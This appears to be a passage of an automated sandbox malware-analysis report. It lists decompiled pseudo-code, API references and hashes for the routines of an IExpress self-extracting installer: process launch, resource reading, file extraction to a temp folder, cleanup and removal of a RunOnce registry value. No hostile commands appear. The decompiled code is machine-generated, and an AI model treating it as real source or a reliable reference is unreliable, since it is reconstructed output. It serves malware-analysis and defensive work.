LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003858E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385943
LocalFree.KERNEL32(00000000,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038594D
CloseHandle.KERNEL32(00000000,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0038595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00385534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00385963

Strings

TMP4351$.TMP, xrefs: 00385923
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003858CD, 003858CF, 00385919, 00385962

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
API String ID: 747627703-3104274291
Opcode ID: 1dff987b3135c7953c05639a7ff719da03f85e984044b20bbd92ef760e831012
Instruction ID: b469211e7e8a934bdba40fa8bbbe74725fcd4dbe247350787e65997b3baf3f0f
Opcode Fuzzy Hash: 1dff987b3135c7953c05639a7ff719da03f85e984044b20bbd92ef760e831012
Instruction Fuzzy Hash: FE113472600710ABD7227FBAAC4DBAB7E9DDF46360F1006D6F50AD72C1DB74980683A0

Uniqueness

Uniqueness Score: -1.00%

Function 00383FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00383FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x388004; // 0xb25159a8
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00386CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x389124 = E00386285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E003844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x388a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x389a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x389a2c = _t44;
						}
					}
				}
				E0038411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x389a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00383fef
0x00383ffa
0x00384001
0x00384008
0x0038400a
0x0038400b
0x00384010
0x0038410a
0x0038411a
0x0038411a
0x0038401c
0x0038401d
0x0038401e
0x0038401f
0x00384033
0x0038403b
0x003840ca
0x003840e9
0x003840f8
0x00384101
0x00384106
0x00384106
0x00384108
0x00384108
0x00000000
0x00384108
0x00384049
0x0038405c
0x00384062
0x00384068
0x0038406e
0x00384070
0x00384077
0x0038407f
0x00384089
0x0038408b
0x0038408b
0x00384089
0x00384077
0x00384091
0x0038409c
0x003840a8
0x003840b8
0x00000000
0x003840c2
0x00000000
0x003840c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00384033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00384049
GetExitCodeProcess.KERNELBASE ref: 0038405C
CloseHandle.KERNEL32(?), ref: 0038409C
CloseHandle.KERNEL32(?), ref: 003840A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003840DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003840E9

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 96120f706920379706d98bbebc89bf28bcc62475f97a16d24b405bb6faeffe0e
Instruction ID: def5a431923aeb19744a5f593a8acf49b993d60e22349a8947b5c6028ebc6725
Opcode Fuzzy Hash: 96120f706920379706d98bbebc89bf28bcc62475f97a16d24b405bb6faeffe0e
Instruction Fuzzy Hash: AA31BF71640718ABEB22AF65DC4DFBBB77CEB94701F1001EAFA05D65A1CA348D85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 003851E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003851E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0038468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0038468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E003844B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x389124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x389124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x389124 = 0x80070714;
					goto L10;
				}
				E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x389124 = E00386285();
				goto L10;
			}

0x003851fb
0x00385207
0x0038520b
0x0038523c
0x00385268
0x00385270
0x0038528b
0x00385293
0x0038529c
0x003852a6
0x003852b0
0x00000000
0x003852b0
0x0038529e
0x00385279
0x00000000
0x0038527b
0x00385273
0x00000000
0x00385273
0x0038524a
0x00385250
0x00385256
0x00000000
0x00385256
0x00385219
0x00385223
0x00000000

APIs

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00382F4D,?,00000002,00000000), ref: 00385201
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00385250

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285

Strings

UPROMPT, xrefs: 003851EF, 00385230
<None>, xrefs: 00385262

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: <None>$UPROMPT
API String ID: 957408736-2980973527
Opcode ID: dfae66423f91943f13a2169d2b9a7b1e0ea3ba01dbfcbf5cbfbbd10614503b36
Instruction ID: 56085e16eb01b9b1d68a86445535bee9d751ef5e9824617d504950e14bb77666
Opcode Fuzzy Hash: dfae66423f91943f13a2169d2b9a7b1e0ea3ba01dbfcbf5cbfbbd10614503b36
Instruction Fuzzy Hash: AA1104B5200702ABE3177BB15C89F3B719EEB88390F1048EAF602DA590DEB99C014325

Uniqueness

Uniqueness Score: -1.00%

Function 003852B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E003852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x388004; // 0xb25159a8
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x3891e0; // 0x2cf8298
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x388a24 == 0 &&  *0x389a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x388a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x388a24 == 0 &&  *0x389a30 == 0) {
					_push(_t22);
					E00381781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					if(( *0x389a34 & 0x00000020) != 0) {
						E003865E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00382390( &_v268);
					_t11 =  *0x388a20; // 0x0
				}
				if( *0x389a40 != 1 && _t11 != 0) {
					_t11 = E00381FE1(_t22); // executed
				}
				 *0x388a20 =  *0x388a20 & 0x00000000;
				return E00386CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x003852b6
0x003852b6
0x003852b6
0x003852c1
0x003852c8
0x003852cb
0x003852cc
0x003852d4
0x003852d6
0x003852d7
0x003852de
0x003852e0
0x003852f2
0x003852fa
0x003852fa
0x00385302
0x00385305
0x0038530c
0x00385312
0x00385316
0x00385316
0x00385317
0x0038531c
0x0038531f
0x00385333
0x00385345
0x00385351
0x00385359
0x00385359
0x00385363
0x00385369
0x0038536f
0x00385374
0x00385374
0x00385381
0x00385387
0x00385387
0x0038538f
0x003853a0

APIs

SetFileAttributesA.KERNELBASE(02CF8298,00000080,?,00000000), ref: 003852F2
DeleteFileA.KERNELBASE(02CF8298), ref: 003852FA
LocalFree.KERNEL32(02CF8298,?,00000000), ref: 00385305
LocalFree.KERNEL32(02CF8298), ref: 0038530C
SetCurrentDirectoryA.KERNELBASE(003811FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00385363

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00385334

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 2833751637-1193786559
Opcode ID: 73918a25c6ffb34ef5cdac494c6548edfcadac45ea26a302c56419e70df1dbd1
Instruction ID: ff7a38721b440707624c601edc02ebc96f052f4da9c2d03f2f0ecf4e00697352
Opcode Fuzzy Hash: 73918a25c6ffb34ef5cdac494c6548edfcadac45ea26a302c56419e70df1dbd1
Instruction Fuzzy Hash: 28219035510B14DFDB37BB20ED49B6977B8BB04750F4901EAE9825A1A0CFF85D89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00381FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00381FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x388530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00381fee
0x00382005
0x0038200d
0x00382017
0x00000000
0x00382020
0x0038200d
0x00382029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0038538C,?,?,0038538C), ref: 00382005
RegDeleteValueA.KERNELBASE(0038538C,wextract_cleanup0,?,?,0038538C), ref: 00382017
RegCloseKey.ADVAPI32(0038538C,?,?,0038538C), ref: 00382020

Strings

wextract_cleanup0, xrefs: 00381FE7, 0038200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00381FFB

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: 61367d3588cc03189e33e3c854f73f7d542faa905751499ec140d667e12eb6f9
Instruction ID: b4b09845957cf5e7f14d4f33b6d04e77742a092c62c456125c06785c2c90caef
Opcode Fuzzy Hash: 61367d3588cc03189e33e3c854f73f7d542faa905751499ec140d667e12eb6f9
Instruction Fuzzy Hash: A7E086B0950318BBE723AFE0EC0AF5A7B6DF741741F6001D5F904A0060EB715E14E705

Uniqueness

Uniqueness Score: -1.00%

Function 00384CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00384CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x388004; // 0xb25159a8
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x3891d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00384E99(_t75);
						L35:
						return E00386CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x388584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x3891e4;
						_t58 = 0x3891e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x3891e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x3891e4;
						_t30 = E00384702( &_v268, 0x3891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0038476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00384980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E003847E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x3893f4 =  *0x3893f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x3891e4;
						_t63 = 0x3891e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x3891e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x3891e4;
						_t30 = E00384702( &_v268, 0x3891e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00384C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00384B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00384B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00384cd0
0x00384cdb
0x00384ce0
0x00384ce2
0x00384cee
0x00384cf2
0x00384d0e
0x00384d0e
0x00384d11
0x00384e83
0x00384e88
0x00384e98
0x00384e98
0x00384d17
0x00384d17
0x00384d1a
0x00384d2f
0x00384d2f
0x00000000
0x00384d2f
0x00384d1c
0x00384d1c
0x00384d1f
0x00384dcb
0x00384dd0
0x00384dd2
0x00384ddd
0x00384ddd
0x00384de3
0x00384de8
0x00384ded
0x00384ded
0x00384def
0x00384df0
0x00384df0
0x00384df4
0x00384df4
0x00384df6
0x00384df9
0x00384dfc
0x00384dfc
0x00384dfe
0x00384dff
0x00384dff
0x00384e03
0x00384e08
0x00384e0a
0x00384e0f
0x00384d03
0x00384d03
0x00000000
0x00384d03
0x00384e18
0x00384e20
0x00384e25
0x00384e27
0x00000000
0x00000000
0x00384e33
0x00384e38
0x00384e3a
0x00000000
0x00000000
0x00384e40
0x00384e51
0x00384e56
0x00384e5b
0x00384e5e
0x00000000
0x00000000
0x00384e6a
0x00384e6f
0x00384e71
0x00000000
0x00000000
0x00384e77
0x00384e7d
0x00000000
0x00384e7d
0x00384d25
0x00384d25
0x00384d28
0x00384d36
0x00384d3b
0x00384d40
0x00384d40
0x00384d42
0x00384d43
0x00384d43
0x00384d47
0x00384d4a
0x00384d4a
0x00384d4c
0x00384d4f
0x00384d4f
0x00384d51
0x00384d52
0x00384d52
0x00384d56
0x00384d5b
0x00384d5d
0x00384d62
0x00000000
0x00000000
0x00384d67
0x00384d6f
0x00384d74
0x00384d76
0x00000000
0x00000000
0x00384d7c
0x00384d84
0x00384d89
0x00384d8b
0x00000000
0x00000000
0x00384d94
0x00384d99
0x00384d9e
0x00384da1
0x00384daa
0x00384daa
0x00384da3
0x00384da3
0x00384da3
0x00384db5
0x00384dbb
0x00384dbd
0x00000000
0x00384dc3
0x00384dc5
0x00000000
0x00384dc5
0x00384dbd
0x00384d2a
0x00384d2a
0x00384d2d
0x00000000
0x00000000
0x00000000
0x00384d2d
0x00384cf8
0x00384cfd
0x00384d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00384DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00384DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00384D36, 00384DE3

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-1193786559
Opcode ID: b4755a7dfb1c4c6ab7505a304494117f33ed129e2e15a8d28f4e4c7de82e71a4
Instruction ID: cbfc8e4d05e425d0a1d6f8d8b3e2ab7c046ead4255a36cf8aed044f3a58fc305
Opcode Fuzzy Hash: b4755a7dfb1c4c6ab7505a304494117f33ed129e2e15a8d28f4e4c7de82e71a4
Instruction Fuzzy Hash: 5741F6362043039BCF27BF38D9546B573A9EB45300F1546E9E8829BE86DA31EE4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 00384C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00384C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x388d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x388d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00384c40
0x00384c4a
0x00384c8d
0x00000000
0x00384c70
0x00384c70
0x00384c7e
0x00384c86
0x00000000
0x00000000
0x00000000
0x00384c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00384C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00384C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00384C7E

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 59cde3e90fa16076ec4815852df8e5cf8d33c99705f05d2b5a9334e270ec99ab
Instruction ID: b81bbee00f5e01373fa49f43bb33c1a45b4106c6d451a5dea6c73a5b32140095
Opcode Fuzzy Hash: 59cde3e90fa16076ec4815852df8e5cf8d33c99705f05d2b5a9334e270ec99ab
Instruction Fuzzy Hash: B9F0307260130EBFAB26EFB5CC49DBB77BDEB04340B4445ABB915C1851EA30D914D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0038487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0038487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0038490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00384880
0x0038488c
0x00384894
0x003848a0
0x003848c9
0x003848ce
0x003848a2
0x003848a8
0x003848b7
0x003848bc
0x003848aa
0x003848ac
0x003848ac
0x003848a8
0x003848de
0x003848e7
0x0038490b
0x003848ee
0x003848f0
0x00000000
0x00384902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00384A23,?,00384F67,*MEMCAB,00008000,00000180), ref: 003848DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00384F67,*MEMCAB,00008000,00000180), ref: 00384902

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
